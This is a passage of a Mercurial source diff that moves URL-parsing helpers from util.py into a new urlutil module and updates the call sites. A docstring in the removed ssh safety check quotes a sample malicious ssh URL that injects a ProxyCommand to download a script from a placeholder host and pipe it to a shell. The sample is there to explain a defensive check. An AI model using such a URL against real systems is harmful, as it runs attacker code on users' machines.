_peerlookup(path): - u = util.url(path) + u = urlutil.url(path) scheme = u.scheme or b'file' thing = schemes.get(scheme) or schemes[b'file'] try: @@ -177,7 +178,7 @@ def openpath(ui, path, sendaccept=True): '''open path with open if local, url.open if remote''' - pathurl = util.url(path, parsequery=False, parsefragment=False) + pathurl = urlutil.url(path, parsequery=False, parsefragment=False) if pathurl.islocal(): return util.posixfile(pathurl.localpath(), b'rb') else: @@ -265,7 +266,7 @@ >>> defaultdest(b'http://example.org/foo/') 'foo' """ - path = util.url(source).path + path = urlutil.url(source).path if not path: return b'' return os.path.basename(os.path.normpath(path)) @@ -571,7 +572,7 @@ # Resolve the value to put in [paths] section for the source. if islocal(source): - defaultpath = os.path.abspath(util.urllocalpath(source)) + defaultpath = os.path.abspath(urlutil.urllocalpath(source)) else: defaultpath = source @@ -693,8 +694,8 @@ else: dest = ui.expandpath(dest) - dest = util.urllocalpath(dest) - source = util.urllocalpath(source) + dest = urlutil.urllocalpath(dest) + source = urlutil.urllocalpath(source) if not dest: raise error.InputError(_(b"empty destination path is not valid")) @@ -825,7 +826,7 @@ abspath = origsource if islocal(origsource): - abspath = os.path.abspath(util.urllocalpath(origsource)) + abspath = os.path.abspath(urlutil.urllocalpath(origsource)) if islocal(dest): cleandir = dest @@ -939,7 +940,7 @@ local.setnarrowpats(storeincludepats, storeexcludepats) narrowspec.copytoworkingcopy(local) - u = util.url(abspath) + u = urlutil.url(abspath) defaulturl = bytes(u) local.ui.setconfig(b'paths', b'default', defaulturl, b'clone') if not stream: @@ -986,7 +987,7 @@ destrepo = destpeer.local() if destrepo: template = uimod.samplehgrcs[b'cloned'] - u = util.url(abspath) + u = urlutil.url(abspath) u.passwd = None defaulturl = bytes(u) destrepo.vfs.write(b'hgrc', util.tonativeeol(template % defaulturl)) @@ -1269,7 +1270,7 @@ other = peer(repo, 
opts, source) cleanupfn = other.close try: - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) revs, checkout = addbranchrevs(repo, other, branches, opts.get(b'rev')) if revs: @@ -1330,7 +1331,7 @@ dest = path.pushloc or path.loc branches = path.branch, opts.get(b'branch') or [] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = addbranchrevs(repo, repo, branches, opts.get(b'rev')) if revs: revs = [repo[rev].node() for rev in scmutil.revrange(repo, revs)] diff --git a/mercurial/hgweb/request.py b/mercurial/hgweb/request.py --- a/mercurial/hgweb/request.py +++ b/mercurial/hgweb/request.py @@ -17,6 +17,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) class multidict(object): @@ -184,7 +187,7 @@ reponame = env.get(b'REPO_NAME') if altbaseurl: - altbaseurl = util.url(altbaseurl) + altbaseurl = urlutil.url(altbaseurl) # https://www.python.org/dev/peps/pep-0333/#environ-variables defines # the environment variables. 
diff --git a/mercurial/hgweb/server.py b/mercurial/hgweb/server.py --- a/mercurial/hgweb/server.py +++ b/mercurial/hgweb/server.py @@ -28,6 +28,9 @@ pycompat, util, ) +from ..utils import ( + urlutil, +) httpservermod = util.httpserver socketserver = util.socketserver @@ -431,7 +434,7 @@ sys.setdefaultencoding(oldenc) address = ui.config(b'web', b'address') - port = util.getport(ui.config(b'web', b'port')) + port = urlutil.getport(ui.config(b'web', b'port')) try: return cls(ui, app, (address, port), handler) except socket.error as inst: diff --git a/mercurial/httpconnection.py b/mercurial/httpconnection.py --- a/mercurial/httpconnection.py +++ b/mercurial/httpconnection.py @@ -18,6 +18,10 @@ pycompat, util, ) +from .utils import ( + urlutil, +) + urlerr = util.urlerr urlreq = util.urlreq @@ -99,7 +103,7 @@ if not prefix: continue - prefixurl = util.url(prefix) + prefixurl = urlutil.url(prefix) if prefixurl.user and prefixurl.user != user: # If a username was set in the prefix, it must match the username in # the URI. diff --git a/mercurial/httppeer.py b/mercurial/httppeer.py --- a/mercurial/httppeer.py +++ b/mercurial/httppeer.py @@ -38,6 +38,7 @@ from .utils import ( cborutil, stringutil, + urlutil, ) httplib = util.httplib @@ -305,7 +306,7 @@ except httplib.HTTPException as inst: ui.debug( b'http error requesting %s\n' - % util.hidepassword(req.get_full_url()) + % urlutil.hidepassword(req.get_full_url()) ) ui.traceback() raise IOError(None, inst) @@ -352,14 +353,14 @@ except AttributeError: proto = pycompat.bytesurl(resp.headers.get('content-type', '')) - safeurl = util.hidepassword(baseurl) + safeurl = urlutil.hidepassword(baseurl) if proto.startswith(b'application/hg-error'): raise error.OutOfBandError(resp.read()) # Pre 1.0 versions of Mercurial used text/plain and # application/hg-changegroup. We don't support such old servers. 
if not proto.startswith(b'application/mercurial-'): - ui.debug(b"requested URL: '%s'\n" % util.hidepassword(requrl)) + ui.debug(b"requested URL: '%s'\n" % urlutil.hidepassword(requrl)) msg = _( b"'%s' does not appear to be an hg repository:\n" b"---%%<--- (%s)\n%s\n---%%<---\n" @@ -1058,7 +1059,7 @@ ``requestbuilder`` is the type used for constructing HTTP requests. It exists as an argument so extensions can override the default. """ - u = util.url(path) + u = urlutil.url(path) if u.query or u.fragment: raise error.Abort( _(b'unsupported URL component: "%s"') % (u.query or u.fragment) diff --git a/mercurial/localrepo.py b/mercurial/localrepo.py --- a/mercurial/localrepo.py +++ b/mercurial/localrepo.py @@ -85,6 +85,7 @@ hashutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -3404,7 +3405,7 @@ def instance(ui, path, create, intents=None, createopts=None): - localpath = util.urllocalpath(path) + localpath = urlutil.urllocalpath(path) if create: createrepository(ui, localpath, createopts=createopts) diff --git a/mercurial/logexchange.py b/mercurial/logexchange.py --- a/mercurial/logexchange.py +++ b/mercurial/logexchange.py @@ -15,6 +15,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) # directory name in .hg/ in which remotenames files will be present remotenamedir = b'logexchange' @@ -117,7 +120,7 @@ # represent the remotepath with user defined path name if exists for path, url in repo.ui.configitems(b'paths'): # remove auth info from user defined url - noauthurl = util.removeauth(url) + noauthurl = urlutil.removeauth(url) # Standardize on unix style paths, otherwise some {remotenames} end up # being an absolute path on Windows. 
diff --git a/mercurial/mail.py b/mercurial/mail.py --- a/mercurial/mail.py +++ b/mercurial/mail.py @@ -34,6 +34,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -139,7 +140,7 @@ defaultport = 465 else: defaultport = 25 - mailport = util.getport(ui.config(b'smtp', b'port', defaultport)) + mailport = urlutil.getport(ui.config(b'smtp', b'port', defaultport)) ui.note(_(b'sending mail: smtp host %s, port %d\n') % (mailhost, mailport)) s.connect(host=mailhost, port=mailport) if starttls: diff --git a/mercurial/repair.py b/mercurial/repair.py --- a/mercurial/repair.py +++ b/mercurial/repair.py @@ -28,11 +28,11 @@ pycompat, requirements, scmutil, - util, ) from .utils import ( hashutil, stringutil, + urlutil, ) @@ -245,7 +245,7 @@ tmpbundleurl = b'bundle:' + vfs.join(tmpbundlefile) txnname = b'strip' if not isinstance(gen, bundle2.unbundle20): - txnname = b"strip\n%s" % util.hidepassword(tmpbundleurl) + txnname = b"strip\n%s" % urlutil.hidepassword(tmpbundleurl) with repo.transaction(txnname) as tr: bundle2.applybundle( repo, gen, tr, source=b'strip', url=tmpbundleurl diff --git a/mercurial/server.py b/mercurial/server.py --- a/mercurial/server.py +++ b/mercurial/server.py @@ -22,7 +22,10 @@ util, ) -from .utils import procutil +from .utils import ( + procutil, + urlutil, +) def runservice( @@ -184,7 +187,7 @@ def _createhgwebservice(ui, repo, opts): # this way we can check if something was given in the command-line if opts.get(b'port'): - opts[b'port'] = util.getport(opts.get(b'port')) + opts[b'port'] = urlutil.getport(opts.get(b'port')) alluis = {ui} if repo: diff --git a/mercurial/sshpeer.py b/mercurial/sshpeer.py --- a/mercurial/sshpeer.py +++ b/mercurial/sshpeer.py @@ -24,6 +24,7 @@ from .utils import ( procutil, stringutil, + urlutil, ) @@ -662,11 +663,11 @@ The returned object conforms to the ``wireprotov1peer.wirepeer`` interface. 
""" - u = util.url(path, parsequery=False, parsefragment=False) + u = urlutil.url(path, parsequery=False, parsefragment=False) if u.scheme != b'ssh' or not u.host or u.path is None: raise error.RepoError(_(b"couldn't parse location %s") % path) - util.checksafessh(path) + urlutil.checksafessh(path) if u.passwd is not None: raise error.RepoError(_(b'password in URL not supported')) diff --git a/mercurial/statichttprepo.py b/mercurial/statichttprepo.py --- a/mercurial/statichttprepo.py +++ b/mercurial/statichttprepo.py @@ -26,6 +26,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -162,7 +165,7 @@ self.ui = ui self.root = path - u = util.url(path.rstrip(b'/') + b"/.hg") + u = urlutil.url(path.rstrip(b'/') + b"/.hg") self.path, authinfo = u.authinfo() vfsclass = build_opener(ui, authinfo) diff --git a/mercurial/subrepo.py b/mercurial/subrepo.py --- a/mercurial/subrepo.py +++ b/mercurial/subrepo.py @@ -44,6 +44,7 @@ dateutil, hashutil, procutil, + urlutil, ) hg = None @@ -57,8 +58,8 @@ """ get a path or url and if it is a path expand it and return an absolute path """ - expandedpath = util.urllocalpath(util.expandpath(path)) - u = util.url(expandedpath) + expandedpath = urlutil.urllocalpath(util.expandpath(path)) + u = urlutil.url(expandedpath) if not u.scheme: path = util.normpath(os.path.abspath(u.path)) return path @@ -745,7 +746,7 @@ self.ui.status( _(b'cloning subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) peer = getpeer() try: @@ -765,7 +766,7 @@ else: self.ui.status( _(b'pulling subrepo %s from %s\n') - % (subrelpath(self), util.hidepassword(srcurl)) + % (subrelpath(self), urlutil.hidepassword(srcurl)) ) cleansub = self.storeclean(srcurl) peer = getpeer() @@ -849,12 +850,12 @@ if self.storeclean(dsturl): self.ui.status( _(b'no changes made to subrepo %s since last push to %s\n') - % (subrelpath(self), 
util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) return None self.ui.status( _(b'pushing subrepo %s to %s\n') - % (subrelpath(self), util.hidepassword(dsturl)) + % (subrelpath(self), urlutil.hidepassword(dsturl)) ) other = hg.peer(self._repo, {b'ssh': ssh}, dsturl) try: @@ -1284,7 +1285,7 @@ args.append(b'%s@%s' % (state[0], state[1])) # SEC: check that the ssh url is safe - util.checksafessh(state[0]) + urlutil.checksafessh(state[0]) status, err = self._svncommand(args, failok=True) _sanitize(self.ui, self.wvfs, b'.svn') @@ -1582,7 +1583,7 @@ def _fetch(self, source, revision): if self._gitmissing(): # SEC: check for safe ssh url - util.checksafessh(source) + urlutil.checksafessh(source) source = self._abssource(source) self.ui.status( diff --git a/mercurial/subrepoutil.py b/mercurial/subrepoutil.py --- a/mercurial/subrepoutil.py +++ b/mercurial/subrepoutil.py @@ -23,7 +23,10 @@ pycompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) nullstate = (b'', b'', b'empty') @@ -136,10 +139,10 @@ kind = kind[1:] src = src.lstrip() # strip any extra whitespace after ']' - if not util.url(src).isabs(): + if not urlutil.url(src).isabs(): parent = _abssource(repo, abort=False) if parent: - parent = util.url(parent) + parent = urlutil.url(parent) parent.path = posixpath.join(parent.path or b'', src) parent.path = posixpath.normpath(parent.path) joined = bytes(parent) @@ -400,13 +403,13 @@ """return pull/push path of repo - either based on parent repo .hgsub info or on the top repo config. 
Abort or return None if no source found.""" if util.safehasattr(repo, b'_subparent'): - source = util.url(repo._subsource) + source = urlutil.url(repo._subsource) if source.isabs(): return bytes(source) source.path = posixpath.normpath(source.path) parent = _abssource(repo._subparent, push, abort=False) if parent: - parent = util.url(util.pconvert(parent)) + parent = urlutil.url(util.pconvert(parent)) parent.path = posixpath.join(parent.path or b'', source.path) parent.path = posixpath.normpath(parent.path) return bytes(parent) @@ -435,7 +438,7 @@ # # D:\>python -c "import os; print os.path.abspath('C:relative')" # C:\some\path\relative - if util.hasdriveletter(path): + if urlutil.hasdriveletter(path): if len(path) == 2 or path[2:3] not in br'\/': path = os.path.abspath(path) return path diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -559,7 +559,7 @@ ) p = p.replace(b'%%', b'%') p = util.expandpath(p) - if not util.hasscheme(p) and not os.path.isabs(p): + if not urlutil.hasscheme(p) and not os.path.isabs(p): p = os.path.normpath(os.path.join(root, p)) c.alter(b"paths", n, p) diff --git a/mercurial/url.py b/mercurial/url.py --- a/mercurial/url.py +++ b/mercurial/url.py @@ -26,7 +26,10 @@ urllibcompat, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) httplib = util.httplib stringio = util.stringio @@ -75,17 +78,17 @@ user, passwd = auth.get(b'username'), auth.get(b'password') self.ui.debug(b"using auth.%s.* for authentication\n" % group) if not user or not passwd: - u = util.url(pycompat.bytesurl(authuri)) + u = urlutil.url(pycompat.bytesurl(authuri)) u.query = None if not self.ui.interactive(): raise error.Abort( _(b'http authorization required for %s') - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write( _(b"http authorization required for %s\n") - % util.hidepassword(bytes(u)) + % urlutil.hidepassword(bytes(u)) ) self.ui.write(_(b"realm: %s\n") % 
pycompat.bytesurl(realm)) if user: @@ -128,7 +131,7 @@ proxyurl.startswith(b'http:') or proxyurl.startswith(b'https:') ): proxyurl = b'http://' + proxyurl + b'/' - proxy = util.url(proxyurl) + proxy = urlutil.url(proxyurl) if not proxy.user: proxy.user = ui.config(b"http_proxy", b"user") proxy.passwd = ui.config(b"http_proxy", b"passwd") @@ -155,7 +158,9 @@ # expects them to be. proxyurl = str(proxy) proxies = {'http': proxyurl, 'https': proxyurl} - ui.debug(b'proxying through %s\n' % util.hidepassword(bytes(proxy))) + ui.debug( + b'proxying through %s\n' % urlutil.hidepassword(bytes(proxy)) + ) else: proxies = {} @@ -219,7 +224,7 @@ new_tunnel = False if new_tunnel or tunnel_host == urllibcompat.getfullurl(req): # has proxy - u = util.url(pycompat.bytesurl(tunnel_host)) + u = urlutil.url(pycompat.bytesurl(tunnel_host)) if new_tunnel or u.scheme == b'https': # only use CONNECT for HTTPS h.realhostport = b':'.join([u.host, (u.port or b'443')]) h.headers = req.headers.copy() @@ -675,7 +680,7 @@ def open(ui, url_, data=None, sendaccept=True): - u = util.url(url_) + u = urlutil.url(url_) if u.scheme: u.scheme = u.scheme.lower() url_, authinfo = u.authinfo() diff --git a/mercurial/util.py b/mercurial/util.py --- a/mercurial/util.py +++ b/mercurial/util.py @@ -28,7 +28,6 @@ import platform as pyplatform import re as remod import shutil -import socket import stat import sys import time @@ -57,6 +56,7 @@ hashutil, procutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -65,7 +65,6 @@ List, Optional, Tuple, - Union, ) @@ -2959,420 +2958,52 @@ return r.sub(lambda x: fn(mapping[x.group()[1:]]), s) -def getport(port): - # type: (Union[bytes, int]) -> int - """Return the port for a given network service. - - If port is an integer, it's returned as is. If it's a string, it's - looked up using socket.getservbyname(). If there's no matching - service, error.Abort is raised. 
- """ - try: - return int(port) - except ValueError: - pass - - try: - return socket.getservbyname(pycompat.sysstr(port)) - except socket.error: - raise error.Abort( - _(b"no port number associated with service '%s'") % port - ) - - -class url(object): - r"""Reliable URL parser. - - This parses URLs and provides attributes for the following - components: - - <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> - - Missing components are set to None. The only exception is - fragment, which is set to '' if present but empty. - - If parsefragment is False, fragment is included in query. If - parsequery is False, query is included in path. If both are - False, both fragment and query are included in path. - - See http://www.ietf.org/rfc/rfc2396.txt for more information. - - Note that for backward compatibility reasons, bundle URLs do not - take host names. That means 'bundle://../' has a path of '../'. - - Examples: - - >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') - <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> - >>> url(b'ssh://[::1]:2200//home/joe/repo') - <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> - >>> url(b'file:///home/joe/repo') - <url scheme: 'file', path: '/home/joe/repo'> - >>> url(b'file:///c:/temp/foo/') - <url scheme: 'file', path: 'c:/temp/foo/'> - >>> url(b'bundle:foo') - <url scheme: 'bundle', path: 'foo'> - >>> url(b'bundle://../foo') - <url scheme: 'bundle', path: '../foo'> - >>> url(br'c:\foo\bar') - <url path: 'c:\\foo\\bar'> - >>> url(br'\\blah\blah\blah') - <url path: '\\\\blah\\blah\\blah'> - >>> url(br'\\blah\blah\blah#baz') - <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> - >>> url(br'file:///C:\users\me') - <url scheme: 'file', path: 'C:\\users\\me'> - - Authentication credentials: - - >>> url(b'ssh://joe:xyz@x/repo') - <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> - >>> url(b'ssh://joe@x/repo') - <url scheme: 'ssh', user: 'joe', host: 'x', 
path: 'repo'> - - Query strings and fragments: - - >>> url(b'http://host/a?b#c') - <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> - >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) - <url scheme: 'http', host: 'host', path: 'a?b#c'> - - Empty path: - - >>> url(b'') - <url path: ''> - >>> url(b'#a') - <url path: '', fragment: 'a'> - >>> url(b'http://host/') - <url scheme: 'http', host: 'host', path: ''> - >>> url(b'http://host/#a') - <url scheme: 'http', host: 'host', path: '', fragment: 'a'> - - Only scheme: - - >>> url(b'http:') - <url scheme: 'http'> - """ - - _safechars = b"!~*'()+" - _safepchars = b"/!~*'()+:\\" - _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match - - def __init__(self, path, parsequery=True, parsefragment=True): - # type: (bytes, bool, bool) -> None - # We slowly chomp away at path until we have only the path left - self.scheme = self.user = self.passwd = self.host = None - self.port = self.path = self.query = self.fragment = None - self._localpath = True - self._hostport = b'' - self._origpath = path - - if parsefragment and b'#' in path: - path, self.fragment = path.split(b'#', 1) - - # special case for Windows drive letters and UNC paths - if hasdriveletter(path) or path.startswith(b'\\\\'): - self.path = path - return - - # For compatibility reasons, we can't handle bundle paths as - # normal URLS - if path.startswith(b'bundle:'): - self.scheme = b'bundle' - path = path[7:] - if path.startswith(b'//'): - path = path[2:] - self.path = path - return - - if self._matchscheme(path): - parts = path.split(b':', 1) - if parts[0]: - self.scheme, path = parts - self._localpath = False - - if not path: - path = None - if self._localpath: - self.path = b'' - return - else: - if self._localpath: - self.path = path - return - - if parsequery and b'?' 
in path: - path, self.query = path.split(b'?', 1) - if not path: - path = None - if not self.query: - self.query = None - - # // is required to specify a host/authority - if path and path.startswith(b'//'): - parts = path[2:].split(b'/', 1) - if len(parts) > 1: - self.host, path = parts - else: - self.host = parts[0] - path = None - if not self.host: - self.host = None - # path of file:///d is /d - # path of file:///d:/ is d:/, not /d:/ - if path and not hasdriveletter(path): - path = b'/' + path - - if self.host and b'@' in self.host: - self.user, self.host = self.host.rsplit(b'@', 1) - if b':' in self.user: - self.user, self.passwd = self.user.split(b':', 1) - if not self.host: - self.host = None - - # Don't split on colons in IPv6 addresses without ports - if ( - self.host - and b':' in self.host - and not ( - self.host.startswith(b'[') and self.host.endswith(b']') - ) - ): - self._hostport = self.host - self.host, self.port = self.host.rsplit(b':', 1) - if not self.host: - self.host = None - - if ( - self.host - and self.scheme == b'file' - and self.host not in (b'localhost', b'127.0.0.1', b'[::1]') - ): - raise error.Abort( - _(b'file:// URLs can only refer to localhost') - ) - - self.path = path - - # leave the query string escaped - for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'): - v = getattr(self, a) - if v is not None: - setattr(self, a, urlreq.unquote(v)) - - def copy(self): - u = url(b'temporary useless value') - u.path = self.path - u.scheme = self.scheme - u.user = self.user - u.passwd = self.passwd - u.host = self.host - u.path = self.path - u.query = self.query - u.fragment = self.fragment - u._localpath = self._localpath - u._hostport = self._hostport - u._origpath = self._origpath - return u - - @encoding.strmethod - def __repr__(self): - attrs = [] - for a in ( - b'scheme', - b'user', - b'passwd', - b'host', - b'port', - b'path', - b'query', - b'fragment', - ): - v = getattr(self, a) - if v is not None: - attrs.append(b'%s: 
%r' % (a, pycompat.bytestr(v))) - return b'<url %s>' % b', '.join(attrs) - - def __bytes__(self): - r"""Join the URL's components back into a URL string. - - Examples: - - >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar')) - 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42')) - 'http://user:pw@host:80/?foo=bar&baz=42' - >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz')) - 'http://user:pw@host:80/?foo=bar%3dbaz' - >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#')) - 'ssh://user:pw@[::1]:2200//home/joe#' - >>> bytes(url(b'http://localhost:80//')) - 'http://localhost:80//' - >>> bytes(url(b'http://localhost:80/')) - 'http://localhost:80/' - >>> bytes(url(b'http://localhost:80')) - 'http://localhost:80/' - >>> bytes(url(b'bundle:foo')) - 'bundle:foo' - >>> bytes(url(b'bundle://../foo')) - 'bundle:../foo' - >>> bytes(url(b'path')) - 'path' - >>> bytes(url(b'file:///tmp/foo/bar')) - 'file:///tmp/foo/bar' - >>> bytes(url(b'file:///c:/tmp/foo/bar')) - 'file:///c:/tmp/foo/bar' - >>> print(url(br'bundle:foo\bar')) - bundle:foo\bar - >>> print(url(br'file:///D:\data\hg')) - file:///D:\data\hg - """ - if self._localpath: - s = self.path - if self.scheme == b'bundle': - s = b'bundle:' + s - if self.fragment: - s += b'#' + self.fragment - return s - - s = self.scheme + b':' - if self.user or self.passwd or self.host: - s += b'//' - elif self.scheme and ( - not self.path - or self.path.startswith(b'/') - or hasdriveletter(self.path) - ): - s += b'//' - if hasdriveletter(self.path): - s += b'/' - if self.user: - s += urlreq.quote(self.user, safe=self._safechars) - if self.passwd: - s += b':' + urlreq.quote(self.passwd, safe=self._safechars) - if self.user or self.passwd: - s += b'@' - if self.host: - if not (self.host.startswith(b'[') and self.host.endswith(b']')): - s += urlreq.quote(self.host) - else: - s += self.host - if self.port: - s += b':' + urlreq.quote(self.port) - if self.host: - s += b'/' - if 
self.path: - # TODO: similar to the query string, we should not unescape the - # path when we store it, the path might contain '%2f' = '/', - # which we should *not* escape. - s += urlreq.quote(self.path, safe=self._safepchars) - if self.query: - # we store the query in escaped form. - s += b'?' + self.query - if self.fragment is not None: - s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars) - return s - - __str__ = encoding.strmethod(__bytes__) - - def authinfo(self): - user, passwd = self.user, self.passwd - try: - self.user, self.passwd = None, None - s = bytes(self) - finally: - self.user, self.passwd = user, passwd - if not self.user: - return (s, None) - # authinfo[1] is passed to urllib2 password manager, and its - # URIs must not contain credentials. The host is passed in the - # URIs list because Python < 2.4.3 uses only that to search for - # a password. - return (s, (None, (s, self.host), self.user, self.passwd or b'')) - - def isabs(self): - if self.scheme and self.scheme != b'file': - return True # remote URL - if hasdriveletter(self.path): - return True # absolute for our purposes - can't be joined() - if self.path.startswith(br'\\'): - return True # Windows UNC path - if self.path.startswith(b'/'): - return True # POSIX-style - return False - - def localpath(self): - # type: () -> bytes - if self.scheme == b'file' or self.scheme == b'bundle': - path = self.path or b'/' - # For Windows, we need to promote hosts containing drive - # letters to paths with drive letters. 
- if hasdriveletter(self._hostport): - path = self._hostport + b'/' + self.path - elif ( - self.host is not None and self.path and not hasdriveletter(path) - ): - path = b'/' + path - return path - return self._origpath - - def islocal(self): - '''whether localpath will return something that posixfile can open''' - return ( - not self.scheme - or self.scheme == b'file' - or self.scheme == b'bundle' - ) - - -def hasscheme(path): - # type: (bytes) -> bool - return bool(url(path).scheme) # cast to help pytype - - -def hasdriveletter(path): - # type: (bytes) -> bool - return bool(path) and path[1:2] == b':' and path[0:1].isalpha() - - -def urllocalpath(path): - # type: (bytes) -> bytes - return url(path, parsequery=False, parsefragment=False).localpath() - - -def checksafessh(path): - # type: (bytes) -> None - """check if a path / url is a potentially unsafe ssh exploit (SEC) - - This is a sanity check for ssh urls. ssh will parse the first item as - an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path. - Let's prevent these potentially exploited urls entirely and warn the - user. - - Raises an error.Abort when the url is unsafe. - """ - path = urlreq.unquote(path) - if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'): - raise error.Abort( - _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),) - ) - - -def hidepassword(u): - # type: (bytes) -> bytes - '''hide user credential in a url string''' - u = url(u) - if u.passwd: - u.passwd = b'***' - return bytes(u) - - -def removeauth(u): - # type: (bytes) -> bytes - '''remove all authentication information from a url string''' - u = url(u) - u.user = u.passwd = None - return bytes(u) +def getport(*args, **kwargs): + msg = b'getport(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.getport(*args, **kwargs) + + +def url(*args, **kwargs): + msg = b'url(...) 
moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.url(*args, **kwargs) + + +def hasscheme(*args, **kwargs): + msg = b'hasscheme(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasscheme(*args, **kwargs) + + +def hasdriveletter(*args, **kwargs): + msg = b'hasdriveletter(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hasdriveletter(*args, **kwargs) + + +def urllocalpath(*args, **kwargs): + msg = b'urllocalpath(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.urllocalpath(*args, **kwargs) + + +def checksafessh(*args, **kwargs): + msg = b'checksafessh(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.checksafessh(*args, **kwargs) + + +def hidepassword(*args, **kwargs): + msg = b'hidepassword(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.hidepassword(*args, **kwargs) + + +def removeauth(*args, **kwargs): + msg = b'removeauth(...) moved to mercurial.utils.urlutil' + nouideprecwarn(msg, b'6.0', stacklevel=2) + return urlutil.removeauth(*args, **kwargs) timecount = unitcountfn( diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py --- a/mercurial/utils/urlutil.py +++ b/mercurial/utils/urlutil.py @@ -5,6 +5,8 @@ # This software may be used and distributed according to the terms of the # GNU General Public License version 2 or any later version. import os +import re as remod +import socket from ..i18n import _ from ..pycompat import ( @@ -12,12 +14,437 @@ setattr, ) from .. import ( + encoding, error, pycompat, - util, + urllibcompat, ) +if pycompat.TYPE_CHECKING: + from typing import ( + Union, + ) + +urlreq = urllibcompat.urlreq + + +def getport(port): + # type: (Union[bytes, int]) -> int + """Return the port for a given network service. 
+ + If port is an integer, it's returned as is. If it's a string, it's + looked up using socket.getservbyname(). If there's no matching + service, error.Abort is raised. + """ + try: + return int(port) + except ValueError: + pass + + try: + return socket.getservbyname(pycompat.sysstr(port)) + except socket.error: + raise error.Abort( + _(b"no port number associated with service '%s'") % port + ) + + +class url(object): + r"""Reliable URL parser. + + This parses URLs and provides attributes for the following + components: + + <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment> + + Missing components are set to None. The only exception is + fragment, which is set to '' if present but empty. + + If parsefragment is False, fragment is included in query. If + parsequery is False, query is included in path. If both are + False, both fragment and query are included in path. + + See http://www.ietf.org/rfc/rfc2396.txt for more information. + + Note that for backward compatibility reasons, bundle URLs do not + take host names. That means 'bundle://../' has a path of '../'. 
+ + Examples: + + >>> url(b'http://www.ietf.org/rfc/rfc2396.txt') + <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'> + >>> url(b'ssh://[::1]:2200//home/joe/repo') + <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'> + >>> url(b'file:///home/joe/repo') + <url scheme: 'file', path: '/home/joe/repo'> + >>> url(b'file:///c:/temp/foo/') + <url scheme: 'file', path: 'c:/temp/foo/'> + >>> url(b'bundle:foo') + <url scheme: 'bundle', path: 'foo'> + >>> url(b'bundle://../foo') + <url scheme: 'bundle', path: '../foo'> + >>> url(br'c:\foo\bar') + <url path: 'c:\\foo\\bar'> + >>> url(br'\\blah\blah\blah') + <url path: '\\\\blah\\blah\\blah'> + >>> url(br'\\blah\blah\blah#baz') + <url path: '\\\\blah\\blah\\blah', fragment: 'baz'> + >>> url(br'file:///C:\users\me') + <url scheme: 'file', path: 'C:\\users\\me'> + + Authentication credentials: + + >>> url(b'ssh://joe:xyz@x/repo') + <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'> + >>> url(b'ssh://joe@x/repo') + <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'> + + Query strings and fragments: + + >>> url(b'http://host/a?b#c') + <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'> + >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False) + <url scheme: 'http', host: 'host', path: 'a?b#c'> + + Empty path: + + >>> url(b'') + <url path: ''> + >>> url(b'#a') + <url path: '', fragment: 'a'> + >>> url(b'http://host/') + <url scheme: 'http', host: 'host', path: ''> + >>> url(b'http://host/#a') + <url scheme: 'http', host: 'host', path: '', fragment: 'a'> + + Only scheme: + + >>> url(b'http:') + <url scheme: 'http'> + """ + + _safechars = 